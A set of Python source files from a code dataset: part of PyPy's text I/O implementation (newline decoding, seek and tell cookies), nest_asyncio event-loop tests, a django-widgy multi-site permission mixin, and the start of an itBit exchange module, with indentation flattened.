SEEN_CR | SEEN_LF | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\n"), space.newunicode(u"\r\n")]),
}
@unwrap_spec(translate=int)
def descr_init(self, space, w_decoder, translate, w_errors=None):
self.w_decoder = w_decoder
self.translate = translate
if space.is_none(w_errors):
self.w_errors = space.newtext("strict")
else:
self.w_errors = w_errors
self.seennl = 0
def newlines_get_w(self, space):
return self.w_newlines_dict.get(self.seennl, space.w_None)
@unwrap_spec(final=int)
def decode_w(self, space, w_input, final=False):
if self.w_decoder is None:
raise oefmt(space.w_ValueError,
"IncrementalNewlineDecoder.__init__ not called")
        # decode input (with the \r pending from a previous pass, if any)
if not space.is_w(self.w_decoder, space.w_None):
w_output = space.call_method(self.w_decoder, "decode",
w_input, space.newbool(bool(final)))
else:
w_output = w_input
if not space.isinstance_w(w_output, space.w_unicode):
raise oefmt(space.w_TypeError,
"decoder should return a string result")
output = space.unicode_w(w_output)
output_len = len(output)
if self.pendingcr and (final or output_len):
output = u'\r' + output
self.pendingcr = False
output_len += 1
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if not final and output_len > 0:
last = output_len - 1
assert last >= 0
if output[last] == u'\r':
output = output[:last]
self.pendingcr = True
output_len -= 1
if output_len == 0:
return space.newunicode(u"")
# Record which newlines are read and do newline translation if
# desired, all in one pass.
seennl = self.seennl
# If, up to now, newlines are consistently \n, do a quick check
# for the \r
only_lf = False
if seennl == SEEN_LF or seennl == 0:
only_lf = (output.find(u'\r') < 0)
if only_lf:
# If not already seen, quick scan for a possible "\n" character.
# (there's nothing else to be done, even when in translation mode)
if seennl == 0 and output.find(u'\n') >= 0:
seennl |= SEEN_LF
# Finished: we have scanned for newlines, and none of them
# need translating.
elif not self.translate:
i = 0
while i < output_len:
if seennl == SEEN_ALL:
break
c = output[i]
i += 1
if c == u'\n':
seennl |= SEEN_LF
elif c == u'\r':
if i < output_len and output[i] == u'\n':
seennl |= SEEN_CRLF
i += 1
else:
seennl |= SEEN_CR
elif output.find(u'\r') >= 0:
# Translate!
builder = UnicodeBuilder(output_len)
i = 0
while i < output_len:
c = output[i]
i += 1
if c == u'\n':
seennl |= SEEN_LF
elif c == u'\r':
if i < output_len and output[i] == u'\n':
seennl |= SEEN_CRLF
i += 1
else:
seennl |= SEEN_CR
builder.append(u'\n')
continue
builder.append(c)
output = builder.build()
self.seennl |= seennl
return space.newunicode(output)
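    # Hedged illustration of the decode_w() translation logic above (not part of
    # the original source): with translate=True, input that decodes to
    # u"a\r\nb\rc\n" is returned as u"a\nb\nc\n" and self.seennl accumulates
    # SEEN_CRLF | SEEN_CR | SEEN_LF; a trailing lone u"\r" is held back in
    # self.pendingcr until the next call so that u"\r\n" pairs are never split.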
def reset_w(self, space):
self.seennl = 0
self.pendingcr = False
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
space.call_method(self.w_decoder, "reset")
def getstate_w(self, space):
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
w_state = space.call_method(self.w_decoder, "getstate")
w_buffer, w_flag = space.unpackiterable(w_state, 2)
flag = space.r_longlong_w(w_flag)
else:
w_buffer = space.newbytes("")
flag = 0
flag <<= 1
if self.pendingcr:
flag |= 1
return space.newtuple([w_buffer, space.newint(flag)])
def setstate_w(self, space, w_state):
w_buffer, w_flag = space.unpackiterable(w_state, 2)
flag = space.r_longlong_w(w_flag)
self.pendingcr = bool(flag & 1)
flag >>= 1
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
w_state = space.newtuple([w_buffer, space.newint(flag)])
space.call_method(self.w_decoder, "setstate", w_state)
W_IncrementalNewlineDecoder.typedef = TypeDef(
'_io.IncrementalNewlineDecoder',
__new__ = generic_new_descr(W_IncrementalNewlineDecoder),
__init__ = interp2app(W_IncrementalNewlineDecoder.descr_init),
decode = interp2app(W_IncrementalNewlineDecoder.decode_w),
reset = interp2app(W_IncrementalNewlineDecoder.reset_w),
getstate = interp2app(W_IncrementalNewlineDecoder.getstate_w),
setstate = interp2app(W_IncrementalNewlineDecoder.setstate_w),
newlines = GetSetProperty(W_IncrementalNewlineDecoder.newlines_get_w),
)
class W_TextIOBase(W_IOBase):
w_encoding = None
def __init__(self, space):
W_IOBase.__init__(self, space)
def read_w(self, space, w_size=None):
self._unsupportedoperation(space, "read")
def readline_w(self, space, w_limit=None):
self._unsupportedoperation(space, "readline")
def write_w(self, space, w_data):
self._unsupportedoperation(space, "write")
def detach_w(self, space):
self._unsupportedoperation(space, "detach")
def errors_get_w(self, space):
return space.w_None
def newlines_get_w(self, space):
return space.w_None
W_TextIOBase.typedef = TypeDef(
'_io._TextIOBase', W_IOBase.typedef,
__new__ = generic_new_descr(W_TextIOBase),
read = interp2app(W_TextIOBase.read_w),
readline = interp2app(W_TextIOBase.readline_w),
write = interp2app(W_TextIOBase.write_w),
detach = interp2app(W_TextIOBase.detach_w),
encoding = interp_attrproperty_w("w_encoding", W_TextIOBase),
newlines = GetSetProperty(W_TextIOBase.newlines_get_w),
errors = GetSetProperty(W_TextIOBase.errors_get_w),
)
def _determine_encoding(space, encoding):
if encoding is not None:
return space.newtext(encoding)
try:
w_locale = space.call_method(space.builtin, '__import__',
space.newtext('locale'))
w_encoding = space.call_method(w_locale, 'getpreferredencoding')
except OperationError as e:
# getpreferredencoding() may also raise ImportError
if not e.match(space, space.w_ImportError):
raise
return space.newtext('ascii')
else:
if space.isinstance_w(w_encoding, space.w_text):
return w_encoding
raise oefmt(space.w_IOError, "could not determine default encoding")
class PositionCookie(object):
def __init__(self, bigint):
self.start_pos = bigint.ulonglongmask()
bigint = bigint.rshift(r_ulonglong.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.dec_flags = x
bigint = bigint.rshift(r_uint.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.bytes_to_feed = x
bigint = bigint.rshift(r_uint.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.chars_to_skip = x
bigint = bigint.rshift(r_uint.BITS)
self.need_eof = bigint.tobool()
def pack(self):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
rb = rbigint.fromrarith_int
res = rb(self.start_pos)
bits = r_ulonglong.BITS
res = res.or_(rb(r_uint(self.dec_flags)).lshift(bits))
bits += r_uint.BITS
res = res.or_(rb(r_uint(self.bytes_to_feed)).lshift(bits))
bits += r_uint.BITS
res = res.or_(rb(r_uint(self.chars_to_skip)).lshift(bits))
bits += r_uint.BITS
return res.or_(rb(r_uint(self.need_eof)).lshift(bits))
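    # Hedged sketch of the cookie layout produced by pack() above, assuming a
    # 64-bit r_ulonglong and 32-bit r_uint (the field widths are platform
    # dependent):
    #
    #   bits 0..63     start_pos
    #   bits 64..95    dec_flags
    #   bits 96..127   bytes_to_feed
    #   bits 128..159  chars_to_skip
    #   bit  160       need_eof
    #
    # __init__ above unpacks the same fields in the same order by repeatedly
    # masking and right-shifting the big integer.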
class PositionSnapshot:
def __init__(self, flags, input):
self.flags = flags
self.input = input
class DecodeBuffer(object):
def __init__(self, text=None):
self.text = text
self.pos = 0
def set(self, space, w_decoded):
check_decoded(space, w_decoded)
self.text = space.unicode_w(w_decoded)
self.pos = 0
def reset(self):
self.text = None
self.pos = 0
def get_chars(self, size):
if self.text is None:
return u""
available = len(self.text) - self.pos
if size < 0 or size > available:
size = available
assert size >= 0
if self.pos > 0 or size < available:
start = self.pos
end = self.pos + size
assert start >= 0
assert end >= 0
chars = self.text[start:end]
else:
chars = self.text
self.pos += size
return chars
def has_data(self):
return (self.text is not None and not self.exhausted())
def exhausted(self):
return self.pos >= len(self.text)
def next_char(self):
if self.exhausted():
raise StopIteration
ch = self.text[self.pos]
self.pos += 1
return ch
def peek_char(self):
# like next_char, but doesn't advance pos
if self.exhausted():
raise StopIteration
ch = self.text[self.pos]
return ch
def find_newline_universal(self, limit):
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
scanned += 1
except StopIteration:
return False
if ch == u'\n':
return True
if ch == u'\r':
if scanned >= limit:
return False
try:
ch = self.peek_char()
except StopIteration:
return False
if ch == u'\n':
self.next_char()
return True
else:
return True
return False
def find_crlf(self, limit):
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
except StopIteration:
return False
scanned += 1
if ch == u'\r':
if scanned >= limit:
return False
try:
if self.peek_char() == u'\n':
self.next_char()
return True
except StopIteration:
# This is the tricky case: we found a \r right at the end
self.pos -= 1
return False
return False
def find_char(self, marker, limit):
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
except StopIteration:
return False
if ch == marker:
return True
scanned += 1
return False
def check_decoded(space, w_decoded):
if not space.isinstance_w(w_decoded, space.w_unicode):
msg = "decoder should return a string result, not '%T'"
raise oefmt(space.w_TypeError, msg, w_decoded)
return w_decoded
class W_TextIOWrapper(W_TextIOBase):
def __init__(self, space):
W_TextIOBase.__init__(self, space)
self.state = STATE_ZERO
self.w_encoder = None
self.w_decoder = None
self.decoded = DecodeBuffer()
        self.pending_bytes = None   # list of bytes objects waiting to be
                                    # written, or None
self.chunk_size = 8192
self.readuniversal = False
self.readtranslate = False
self.readnl = None
self.encodefunc = None # Specialized encoding func (see below)
self.encoding_start_of_stream = False # Whether or not it's the start
# of the stream
self.snapshot = None
@unwrap_spec(encoding="text_or_none", line_buffering=int)
def descr_init(self, space, w_buffer, encoding=None,
w_errors=None, w_newline=None, line_buffering=0):
self.state = STATE_ZERO
self.w_buffer = w_buffer
self.w_encoding = _determine_encoding(space, encoding)
if space.is_none(w_errors):
w_errors = space.newtext("strict")
self.w_errors = w_errors
if space.is_none(w_newline):
newline = None
else:
newline = space.unicode_w(w_newline)
if newline and newline not in (u'\n', u'\r\n', u'\r'):
raise oefmt(space.w_ValueError,
"illegal newline value: %R", w_newline)
self.line_buffering = line_buffering
self.readuniversal = not newline # null or empty
self.readtranslate = newline is None
self.readnl = newline
self.writetranslate = (newline != u'')
if not self.readuniversal:
self.writenl = self.readnl
if self.writenl == u'\n':
self.writenl = None
elif _WINDOWS:
self.writenl = u"\r\n"
else:
self.writenl = None
# build the decoder object
if space.is_true(space.call_method(w_buffer, "readable")):
w_codec = interp_codecs.lookup_codec(space,
space.text_w(self.w_encoding))
self.w_decoder = space.call_method(w_codec,
"incrementaldecoder", w_errors)
if self.readuniversal:
self.w_decoder = space.call_function(
space.gettypeobject(W_IncrementalNewlineDecoder.typedef),
self.w_decoder, space.newbool(self.readtranslate))
# build the encoder object
if space.is_true(space.call_method(w_buffer, "writable")):
w_codec = interp_codecs.lookup_codec(space,
space.text_w(self.w_encoding))
self.w_encoder = space.call_method(w_codec,
"incrementalencoder", w_errors)
self.seekable = space.is_true(space.call_method(w_buffer, "seekable"))
self.telling = self.seekable
self.encoding_start_of_stream = False
if self.seekable and self.w_encoder:
self.encoding_start_of_stream = True
w_cookie = space.call_method(self.w_buffer, "tell")
if not space.eq_w(w_cookie, space.newint(0)):
self.encoding_start_of_stream = False
space.call_method(self.w_encoder, "setstate", space.newint(0))
self.state = STATE_OK
def _check_init(self, space):
if self.state == STATE_ZERO:
raise oefmt(space.w_ValueError,
"I/O operation on uninitialized object")
def _check_attached(self, space):
if self.state == STATE_DETACHED:
raise oefmt(space.w_ValueError,
"underlying buffer has been detached")
self._check_init(space)
def _check_closed(self, space, message=None):
self._check_init(space)
W_TextIOBase._check_closed(self, space, message)
def descr_repr(self, space):
self._check_init(space)
w_name = space.findattr(self, space.newtext("name"))
if w_name is None:
w_name_str = space.newtext("")
else:
w_name_str = space.mod(space.newtext("name=%r "), w_name)
w_args = space.newtuple([w_name_str, self.w_encoding])
return space.mod(
space.newtext("<_io.TextIOWrapper %sencoding=%r>"), w_args
)
def readable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "readable")
def writable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "writable")
def seekable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "seekable")
def isatty_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "isatty")
def fileno_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "fileno")
def closed_get_w(self, space):
self._check_attached(space)
return space.getattr(self.w_buffer, space.newtext("closed"))
def newlines_get_w(self, space):
self._check_attached(space)
if self.w_decoder is None:
return space.w_None
return space.findattr(self.w_decoder, space.newtext("newlines"))
def name_get_w(self, space):
self._check_attached(space)
return space.getattr(self.w_buffer, space.newtext("name"))
def flush_w(self, space):
self._check_attached(space)
self._check_closed(space)
self.telling = self.seekable
self._writeflush(space)
space.call_method(self.w_buffer, "flush")
@unwrap_spec(w_pos = WrappedDefault(None))
def truncate_w(self, space, w_pos=None):
self._check_attached(space)
space.call_method(self, "flush")
return space.call_method(self.w_buffer, "truncate", w_pos)
def close_w(self, space):
self._check_attached(space)
if not space.is_true(space.getattr(self.w_buffer,
space.newtext("closed"))):
try:
space.call_method(self, "flush")
finally:
ret = space.call_method(self.w_buffer, "close")
return ret
# _____________________________________________________________
# read methods
def _read_chunk(self, space):
"""Read and decode the next chunk of data from the BufferedReader.
The return value is True unless EOF was reached. The decoded string
is placed in self.decoded (replacing its previous value).
The entire input chunk is sent to the decoder, though some of it may
remain buffered in the decoder, yet to be converted."""
if not self.w_decoder:
raise oefmt(space.w_IOError, "not readable")
if self.telling:
# To prepare for tell(), we need to snapshot a point in the file
# where the decoder's input buffer is empty.
w_state = space.call_method(self.w_decoder, "getstate")
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
w_dec_buffer, w_dec_flags = space.unpackiterable(w_state, 2)
dec_buffer = space.bytes_w(w_dec_buffer)
dec_flags = space.int_w(w_dec_flags)
else:
dec_buffer = None
dec_flags = 0
# Read a chunk, decode it, and put the result in self.decoded
w_input = space.call_method(self.w_buffer, "read1",
space.newint(self.chunk_size))
if not space.isinstance_w(w_input, space.w_bytes):
msg = "decoder getstate() should have returned a bytes " \
"object not '%T'"
raise oefmt(space.w_TypeError, msg, w_input)
eof = space.len_w(w_input) == 0
w_decoded = space.call_method(self.w_decoder, "decode",
w_input, space.newbool(eof))
self.decoded.set(space, w_decoded)
if space.len_w(w_decoded) > 0:
eof = False
if self.telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
next_input = dec_buffer + space.bytes_w(w_input)
self.snapshot = PositionSnapshot(dec_flags, next_input)
return not eof
def _ensure_data(self, space):
while not self.decoded.has_data():
try:
if not self._read_chunk(space):
self.decoded.reset()
self.snapshot = None
return False
except OperationError as e:
if trap_eintr(space, e):
continue
raise
return True
def next_w(self, space):
self._check_attached(space)
self.telling = False
try:
return W_TextIOBase.next_w(self, space)
except OperationError as e:
if e.match(space, space.w_StopIteration):
self.telling = self.seekable
raise
def read_w(self, space, w_size=None):
self._check_attached(space)
self._check_closed(space)
if not self.w_decoder:
raise oefmt(space.w_IOError, "not readable")
size = convert_size(space, w_size)
self._writeflush(space)
if size < 0:
# Read everything
w_bytes = space.call_method(self.w_buffer, "read")
w_decoded = space.call_method(self.w_decoder, "decode", w_bytes, space.w_True)
check_decoded(space, w_decoded)
w_result = space.newunicode(self.decoded.get_chars(-1))
w_final = space.add(w_result, w_decoded)
self.snapshot = None
return w_final
remaining = size
builder = UnicodeBuilder(size)
# Keep reading chunks until we have n characters to return
while remaining > 0:
if not self._ensure_data(space):
break
data = self.decoded.get_chars(remaining)
builder.append(data)
remaining -= len(data)
return space.newunicode(builder.build())
def _scan_line_ending(self, limit):
if self.readuniversal:
return self.decoded.find_newline_universal(limit)
else:
if self.readtranslate:
# Newlines are already translated, only search for \n
newline = u'\n'
else:
# Non-universal mode.
newline = self.readnl
if newline == u'\r\n':
return self.decoded.find_crlf(limit)
else:
return self.decoded.find_char(newline[0], limit)
def readline_w(self, space, w_limit=None):
self._check_attached(space)
self._check_closed(space)
self._writeflush(space)
limit = convert_size(space, w_limit)
remnant = None
builder = UnicodeBuilder()
while True:
# First, get some data if necessary
has_data = self._ensure_data(space)
if not has_data:
# end of file
if remnant:
builder.append(remnant)
break
if remnant:
assert not self.readtranslate and self.readnl == u'\r\n'
assert self.decoded.pos == 0
if remnant == u'\r' and self.decoded.text[0] == u'\n':
builder.append(u'\r\n')
self.decoded.pos = 1
remnant = None
break
else:
builder.append(remnant)
remnant = None
continue
if limit >= 0:
remaining = limit - builder.getlength()
assert remaining >= 0
else:
remaining = -1
start = self.decoded.pos
assert start >= 0
found = self._scan_line_ending(remaining)
end_scan = self.decoded.pos
if end_scan > start:
s = self.decoded.text[start:end_scan]
builder.append(s)
if found or (limit >= 0 and builder.getlength() >= limit):
break
# There may be some remaining chars we'll have to prepend to the
# next chunk of data
if not self.decoded.exhausted():
remnant = self.decoded.get_chars(-1)
# We have consumed the buffer
self.decoded.reset()
result = builder.build()
return space.newunicode(result)
# _____________________________________________________________
# write methods
def write_w(self, space, w_text):
self._check_attached(space)
self._check_closed(space)
if not self.w_encoder:
raise oefmt(space.w_IOError, "not writable")
if not space.isinstance_w(w_text, space.w_unicode):
raise oefmt(space.w_TypeError,
"unicode argument expected, got '%T'", w_text)
text = space.unicode_w(w_text)
textlen = len(text)
haslf = False
if (self.writetranslate and self.writenl) or self.line_buffering:
if text.find(u'\n') >= 0:
haslf = True
if haslf and self.writetranslate and self.writenl:
w_text = space.call_method(w_text, "replace", space.newunicode(u'\n'),
space.newunicode(self.writenl))
text = space.unicode_w(w_text)
needflush = False
if self.line_buffering and (haslf or text.find(u'\r') >= 0):
needflush = True
# XXX What if we were just reading?
if self.encodefunc:
w_bytes = self.encodefunc(space, w_text, self.errors)
self.encoding_start_of_stream = False
else:
w_bytes = space.call_method(self.w_encoder, "encode", w_text)
b = space.bytes_w(w_bytes)
if not self.pending_bytes:
self.pending_bytes = []
self.pending_bytes_count = 0
self.pending_bytes.append(b)
self.pending_bytes_count += len(b)
if self.pending_bytes_count > self.chunk_size or needflush:
self._writeflush(space)
if needflush:
space.call_method(self.w_buffer, "flush")
self.snapshot = None
if self.w_decoder:
space.call_method(self.w_decoder, "reset")
return space.newint(textlen)
def _writeflush(self, space):
if not self.pending_bytes:
return
pending_bytes = ''.join(self.pending_bytes)
self.pending_bytes = None
self.pending_bytes_count = 0
while True:
try:
space.call_method(self.w_buffer, "write",
space.newbytes(pending_bytes))
except OperationError as e:
if trap_eintr(space, e):
continue
raise
else:
break
def detach_w(self, space):
self._check_attached(space)
space.call_method(self, "flush")
w_buffer = self.w_buffer
self.w_buffer = None
self.state = STATE_DETACHED
return w_buffer
# _____________________________________________________________
# seek/tell
def _decoder_setstate(self, space, cookie):
# When seeking to the start of the stream, we call decoder.reset()
# rather than decoder.getstate().
# This is for a few decoders such as utf-16 for which the state value
# at start is not (b"", 0) but e.g. (b"", 2) (meaning, in the case of
# utf-16, that we are expecting a BOM).
if cookie.start_pos == 0 and cookie.dec_flags == 0:
space.call_method(self.w_decoder, "reset")
else:
space.call_method(self.w_decoder, "setstate",
space.newtuple([space.newbytes(""),
space.newint(cookie.dec_flags)]))
def _encoder_setstate(self, space, cookie):
if cookie.start_pos == 0 and cookie.dec_flags == 0:
space.call_method(self.w_encoder, "reset")
self.encoding_start_of_stream = True
else:
space.call_method(self.w_encoder, "setstate", space.newint(0))
self.encoding_start_of_stream = False
@unwrap_spec(whence=int)
def seek_w(self, space, w_pos, whence=0):
self._check_attached(space)
if not self.seekable:
raise oefmt(space.w_IOError, "underlying stream is not seekable")
if whence == 1:
# seek relative to current position
if not space.eq_w(w_pos, space.newint(0)):
raise oefmt(space.w_IOError,
"can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to sync the
# underlying buffer with the current position.
w_pos = space.call_method(self, "tell")
elif whence == 2:
# seek relative to end of file
if not space.eq_w(w_pos, space.newint(0)):
raise oefmt(space.w_IOError,
"can't do nonzero end-relative seeks")
space.call_method(self, "flush")
self.decoded.reset()
self.snapshot = None
if self.w_decoder:
space.call_method(self.w_decoder, "reset")
return space.call_method(self.w_buffer, "seek",
w_pos, space.newint(whence))
elif whence != 0:
raise oefmt(space.w_ValueError,
"invalid whence (%d, should be 0, 1 or 2)",
whence)
if space.is_true(space.lt(w_pos, space.newint(0))):
raise oefmt(space.w_ValueError,
"negative seek position %R", w_pos)
space.call_method(self, "flush")
# The strategy of seek() is to go back to the safe start point and
# replay the effect of read(chars_to_skip) from there.
cookie = PositionCookie(space.bigint_w(w_pos))
# Seek back to the safe start point
space.call_method(self.w_buffer, "seek", space.newint(cookie.start_pos))
self.decoded.reset()
self.snapshot = None
# Restore the decoder to its state from the safe start point.
if self.w_decoder:
self._decoder_setstate(space, cookie)
if cookie.chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
w_chunk = space.call_method(self.w_buffer, "read",
space.newint(cookie.bytes_to_feed))
if not space.isinstance_w(w_chunk, space.w_bytes):
msg = "underlying read() should have returned " \
"a bytes object, not '%T'"
raise oefmt(space.w_TypeError, msg, w_chunk)
self.snapshot = PositionSnapshot(cookie.dec_flags,
space.bytes_w(w_chunk))
w_decoded = space.call_method(self.w_decoder, "decode",
w_chunk, space.newbool(bool(cookie.need_eof)))
w_decoded = check_decoded(space, w_decoded)
# Skip chars_to_skip of the decoded characters
if space.len_w(w_decoded) < cookie.chars_to_skip:
raise oefmt(space.w_IOError,
"can't restore logical file position")
self.decoded.set(space, w_decoded)
self.decoded.pos = cookie.chars_to_skip
else:
self.snapshot = PositionSnapshot(cookie.dec_flags, "")
# Finally, reset the encoder (merely useful for proper BOM handling)
if self.w_encoder:
self._encoder_setstate(space, cookie)
return w_pos
def tell_w(self, space):
self._check_closed(space)
if not self.seekable:
raise oefmt(space.w_IOError, "underlying stream is not seekable")
if not self.telling:
raise oefmt(space.w_IOError,
"telling position disabled by next() call")
self._writeflush(space)
space.call_method(self, "flush")
w_pos = space.call_method(self.w_buffer, "tell")
if self.w_decoder is None or self.snapshot is None:
assert not self.decoded.text
return w_pos
cookie = PositionCookie(space.bigint_w(w_pos))
# Skip backward to the snapshot point (see _read_chunk)
cookie.dec_flags = self.snapshot.flags
input = self.snapshot.input
cookie.start_pos -= len(input)
# How many decoded characters have been used up since the snapshot?
if not self.decoded.pos:
# We haven't moved from the snapshot point.
return space.newlong_from_rbigint(cookie.pack())
chars_to_skip = self.decoded.pos
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
w_saved_state = space.call_method(self.w_decoder, "getstate")
try:
# Note our initial start point
self._decoder_setstate(space, cookie)
# Feed the decoder one byte at a time. As we go, note the nearest
# "safe start point" before the current location (a point where
# the decoder has nothing buffered, so seek() can safely start
# from there and advance to this location).
chars_decoded = 0
i = 0
while i < len(input):
w_decoded = space.call_method(self.w_decoder, "decode",
space.newbytes(input[i]))
check_decoded(space, w_decoded)
chars_decoded += space.len_w(w_decoded)
cookie.bytes_to_feed += 1
w_state = space.call_method(self.w_decoder, "getstate")
w_dec_buffer, w_flags = space.unpackiterable(w_state, 2)
dec_buffer_len = space.len_w(w_dec_buffer)
if dec_buffer_len == 0 and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
cookie.start_pos += cookie.bytes_to_feed
chars_to_skip -= chars_decoded
assert chars_to_skip >= 0
cookie.dec_flags = space.int_w(w_flags)
cookie.bytes_to_feed = 0
chars_decoded = 0
if chars_decoded >= chars_to_skip:
break
i += 1
else:
# We didn't get enough decoded data; signal EOF to get more.
w_decoded = space.call_method(self.w_decoder, "decode",
space.newbytes(""),
space.newint(1)) # final=1
check_decoded(space, w_decoded)
chars_decoded += space.len_w(w_decoded)
cookie.need_eof = 1
if chars_decoded < chars_to_skip:
raise oefmt(space.w_IOError,
"can't reconstruct logical file position")
finally:
space.call_method(self.w_decoder, "setstate", w_saved_state)
# The returned cookie corresponds to the last safe start point.
cookie.chars_to_skip = chars_to_skip
return space.newlong_from_rbigint(cookie.pack())
def chunk_size_get_w(self, space):
self._check_attached(space)
return space.newint(self.chunk_size)
def chunk_size_set_w(self, space, w_size):
self._check_attached(space)
size = space.int_w(w_size)
if size <= 0:
raise oefmt(space.w_ValueError,
"a strictly positive integer is required")
self.chunk_size = size
W_TextIOWrapper.typedef = TypeDef(
'_io.TextIOWrapper', W_TextIOBase.typedef,
__new__ = generic_new_descr(W_TextIOWrapper),
__init__ = interp2app(W_TextIOWrapper.descr_init),
__repr__ = interp2app(W_TextIOWrapper.descr_repr),
next = interp2app(W_TextIOWrapper.next_w),
read = interp2app(W_TextIOWrapper.read_w),
readline = interp2app(W_TextIOWrapper.readline_w),
write = interp2app(W_TextIOWrapper.write_w),
seek = interp2app(W_TextIOWrapper.seek_w),
tell = interp2app(W_TextIOWrapper.tell_w),
detach = interp2app(W_TextIOWrapper.detach_w),
flush = interp2app(W_TextIOWrapper.flush_w),
truncate = interp2app(W_TextIOWrapper.truncate_w),
close = interp2app(W_TextIOWrapper.close_w),
line_buffering = interp_attrproperty("line_buffering", W_TextIOWrapper,
wrapfn="newint"),
readable = interp2app(W_TextIOWrapper.readable_w),
writable = interp2app(W_TextIOWrapper.writable_w),
seekable = interp2app(W_TextIOWrapper.seekable_w),
isatty = interp2app(W_TextIOWrapper.isatty_w),
fileno = interp2app(W_TextIOWrapper.fileno_w),
name = GetSetProperty(W_TextIOWrapper.name_get_w),
buffer = interp_attrproperty_w("w_buffer", cls=W_TextIOWrapper),
closed = GetSetProperty(W_TextIOWrapper.closed_get_w),
errors = interp_attrproperty_w("w_errors", cls=W_TextIOWrapper),
newlines = GetSetProperty(W_TextIOWrapper.newlines_get_w),
_CHUNK_SIZE = GetSetProperty(
W_TextIOWrapper.chunk_size_get_w, W_TextIOWrapper.chunk_size_set_w
),
)
|
tests/nest_test.py
|
cheginit/nest_asyncio
| 362 |
66705
|
import asyncio
import sys
import unittest
import nest_asyncio
def exception_handler(loop, context):
print('Exception:', context)
class NestTest(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
nest_asyncio.apply(self.loop)
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.set_exception_handler(exception_handler)
def tearDown(self):
self.assertIsNone(asyncio._get_running_loop())
self.loop.close()
del self.loop
async def coro(self):
await asyncio.sleep(0.01)
return 42
def test_nesting(self):
async def f1():
result = self.loop.run_until_complete(self.coro())
self.assertEqual(result, await self.coro())
return result
async def f2():
result = self.loop.run_until_complete(f1())
self.assertEqual(result, await f1())
return result
result = self.loop.run_until_complete(f2())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete(self):
async def f():
task = asyncio.ensure_future(self.coro())
return self.loop.run_until_complete(task)
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete_with_wait(self):
async def f():
task = asyncio.ensure_future(self.coro())
done, pending = self.loop.run_until_complete(
asyncio.wait([task], return_when=asyncio.ALL_COMPLETED))
task = done.pop()
return task.result()
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_timeout(self):
async def f1():
await asyncio.sleep(0.1)
async def f2():
asyncio.run(asyncio.wait_for(f1(), 0.01))
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(f2())
def test_two_run_until_completes_in_one_outer_loop(self):
async def f1():
self.loop.run_until_complete(asyncio.sleep(0.02))
return 4
async def f2():
self.loop.run_until_complete(asyncio.sleep(0.01))
return 2
result = self.loop.run_until_complete(
asyncio.gather(f1(), f2()))
self.assertEqual(result, [4, 2])
@unittest.skipIf(sys.version_info < (3, 7, 0), 'No contextvars module')
def test_contextvars(self):
from contextvars import ContextVar
var = ContextVar('var')
var.set(0)
async def set_val():
var.set(42)
async def coro():
await set_val()
await asyncio.sleep(0.01)
return var.get()
result = self.loop.run_until_complete(coro())
self.assertEqual(result, 42)
if __name__ == '__main__':
unittest.main()
|
widgy/contrib/widgy_mezzanine/site.py
|
isopets/django-widgy
| 168 |
66709
|
<gh_stars>100-1000
from mezzanine.utils.sites import current_site_id, has_site_permission
from widgy.models import Content
class MultiSitePermissionMixin(object):
def _can_edit_content(self, request, obj):
if isinstance(obj, Content):
owners = obj.get_root().node.versiontracker_set.get().owners
any_owner_in_current_site = any(current_site_id() == o.site_id for o in owners)
return has_site_permission(request.user) and any_owner_in_current_site
else:
return True
def has_add_permission(self, request, parent, created_obj_cls):
if not self._can_edit_content(request, parent):
return False
return super(MultiSitePermissionMixin, self).has_add_permission(
request, parent, created_obj_cls)
def has_change_permission(self, request, obj_or_class):
if not self._can_edit_content(request, obj_or_class):
return False
return super(MultiSitePermissionMixin, self).has_change_permission(request, obj_or_class)
def has_delete_permission(self, request, obj_or_class):
if not all(self._can_edit_content(request, o) for o in obj_or_class.depth_first_order()):
return False
return super(MultiSitePermissionMixin, self).has_delete_permission(request, obj_or_class)
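# Hedged usage sketch (not part of the original module; the WidgySite import and
# class names below are illustrative assumptions): the mixin is meant to be
# combined with a widgy site class, e.g.
#
#   from widgy.site import WidgySite
#
#   class MultiSiteWidgySite(MultiSitePermissionMixin, WidgySite):
#       pass
#
# so that the has_*_permission checks above also enforce Mezzanine's per-site
# ownership rules.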
|
gryphon/lib/exchange/itbit_btc_usd.py
|
scooke11/gryphon
| 1,109 |
66717
|
<filename>gryphon/lib/exchange/itbit_btc_usd.py<gh_stars>1000+
"""
Exchange documentation: https://api.itbit.com/docs
"""
# -*- coding: utf-8 -*-
import base64
from collections import OrderedDict, defaultdict
